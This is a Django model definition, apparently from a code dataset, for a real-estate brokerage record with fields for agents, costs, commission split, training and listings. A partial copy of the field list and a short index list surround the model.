ContactLink = models.CharField(max_length=1000)
TotalAgents = models.IntegerField()
Location = models.CharField(max_length=500)
Desks = models.IntegerField()
YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
CommisionSplit = models.CharField(max_length=8)
Cap = models.DecimalField(max_digits=12, decimal_places=2)
TrainingPerWeek = models.IntegerField()
Onboarding = models.BooleanField()
Mentorship = models.BooleanField()
Teams_Hiring = models.BooleanField()
Marketing = models.CharField(max_length=500)
TotalListings = models.IntegerField()
ConferenceRooms = models.BooleanField()
OfficeLeaders = models.CharField(max_length=500)
| from django.db import models
class Brokerage(models.Model):
BrokerageName = models.CharField(max_length=500)
#To-Do Fix additional settings for ImagesFields/FileFields
#BrokerageLogo = ImageField
ReviewLink = models.CharField(max_length=1000)
ContactLink = models.CharField(max_length=1000)
TotalAgents = models.IntegerField()
Location = models.CharField(max_length=500)
Desks = models.IntegerField()
YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
CommisionSplit = models.CharField (max_length=8)
#To-Do set a getter for Cap that returns none
Cap = models.DecimalField(max_digits=12, decimal_places=2)
TrainingPerWeek = models.IntegerField()
Onboarding = models.BooleanField()
Mentorship = models.BooleanField()
Teams_Hiring = models.BooleanField()
Marketing = models.CharField(max_length=500)
TotalListings = models.IntegerField()
ConferenceRooms = models.BooleanField()
OfficeLeaders = models.CharField (max_length=500)
#OfficeLeaderPhoto = models.ImageField
| [
0,
1,
2,
3,
4
] |